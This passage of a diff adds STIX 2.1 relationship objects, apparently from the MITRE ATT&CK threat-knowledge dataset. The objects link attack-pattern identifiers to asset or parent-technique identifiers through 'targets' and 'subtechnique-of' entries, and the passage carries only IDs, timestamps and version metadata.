"x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08286006-836d-4571-880a-28ba87edfff4", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08311e47-14e0-4364-b781-a93552e34bec", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--084851a8-cdd8-487a-a90f-446dec8a8438", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--085b6205-183a-4380-9f51-1101521a5b75", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1b20efbf-8063-4fc3-a07d-b575318a301b", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--085ea24e-623e-47c0-867c-11315577b575", + "created": "2024-06-27T09:45:13.131Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:45:13.131Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0870d9e5-5b94-4560-8199-9d23bd6d4082", + "created": "2024-06-26T14:29:29.988Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:29:29.988Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7b50a1d3-4ca7-45d1-989d-a6503f04bfe1", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08a24ad6-9f47-415c-ac98-ea9b9d8c17b9", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--34a80bc4-80f2-46e6-94ff-f3265a4b657c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08a9f711-f309-4307-917e-c9059db7b1ee", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08b02366-a39c-4346-9125-4591c59f5c95", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dfebc3b7-d19d-450b-81c7-6dafe4184c04", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08b532b2-3f5a-4700-89c7-43b856f0f565", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4cbc6a62-9e34-4f94-8a19-5c1a11392a49", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08d0ef96-d105-4051-925a-7d3529ce2f2e", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08e5536e-2a6d-44c0-8764-9c30d92e228b", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08ed51ca-98c2-4b26-995a-184151daa194", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--08fc37d1-2314-4661-abdb-1bf0472b2bf1", + "created": "2020-01-24T17:42:23.793Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "target_ref": "attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09183dac-f5db-498c-b8d7-625ef5abd476", + "created": "2024-06-26T13:55:30.520Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:55:30.520Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0918808c-22be-4fcb-afc5-75440e7ea91d", + "created": "2024-06-26T13:51:42.141Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:51:42.141Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4694861-542c-48ea-9eb1-10d356e7140a", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0921c234-5e17-40fc-a674-20c46f6b28b1", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09254382-c7cd-4340-97c2-d8ecda757e59", + "created": "2020-02-20T14:34:08.740Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "attack-pattern--5909f20f-3c39-4795-be06-ef1ea40d350b", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09271ddd-916f-4c15-a555-1418a6a52470", + "created": "2024-06-26T11:55:10.861Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:55:10.861Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--093cd85f-deb4-4453-b478-8b40b0150d1b", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--093f5115-e6ab-4bc6-ba27-4abb3bf1765f", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09466c47-0e23-40af-953d-1f225f92bf1f", + "created": "2024-06-21T14:12:20.260Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.260Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8c41090b-aa47-4331-986b-8c9a51a91103", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--094a5374-5a35-4da2-a744-6455a9ddea1b", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0951222a-42d1-4635-bb12-5285bc6500e0", + "created": "2023-09-28T20:15:45.244Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:15:45.244Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--095456bc-898b-4c76-a062-ff0ea90aeab4", + "created": "2023-09-28T21:25:05.393Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:25:05.393Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--096ac966-8296-4fda-85f8-58b1f848c1bf", + "created": "2024-06-26T13:55:45.113Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:55:45.113Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0bda01d5-4c1d-4062-8ee2-6872334383c3", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--096c3136-dac9-4729-98c0-c8d870f2bd13", + "created": "2023-09-28T19:42:01.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:42:01.055Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09bb741d-4f8b-4ae5-95f7-38d85e4d825a", + "created": "2020-10-19T17:58:04.374Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fa44a152-ac48-441e-a524-dd7b04b8adcd", + "target_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09c76211-6357-4dc3-b4f6-361007e21af9", + "created": "2020-10-02T17:03:46.050Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41", + "target_ref": "attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09d28590-1303-4a22-8d7e-3b8f2e2ca548", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09e0c991-1707-431b-a0fd-fd8215e6d552", + "created": "2023-09-28T20:30:12.291Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:30:12.291Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09e1fa82-8b07-4f33-bc22-70fc52e2600e", + "created": "2024-07-02T13:55:55.748Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.748Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--215d9700-5881-48b8-8265-6449dbb7195d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--09e9ed5d-bf32-4aee-8441-774e21ffbdb6", + "created": "2023-09-28T19:53:56.266Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T19:53:56.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a08c94b-0fd9-45d2-bdc9-df380d02027d", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a0ff868-0ae4-4042-b6e3-121eaec4da24", + "created": "2024-07-02T13:55:55.767Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.767Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d336b553-5da9-46ca-98a8-0b23f49fb447", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a2d4368-a378-4afa-86ec-2a302b997597", + "created": "2024-06-27T09:12:57.131Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:12:57.131Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4fd8a28b-4b3a-4cd6-a8cf-85ba5f824a7f", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a390d78-494c-41b9-af18-1d404924aa0f", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d742a578-d70e-4d0e-96a6-02a9c30204e6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a3942c2-8bfc-4751-9a5d-c53013c45e80", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0a421699-f013-49f4-9d9f-01d95d210510", + "created": "2023-09-28T19:37:25.214Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], 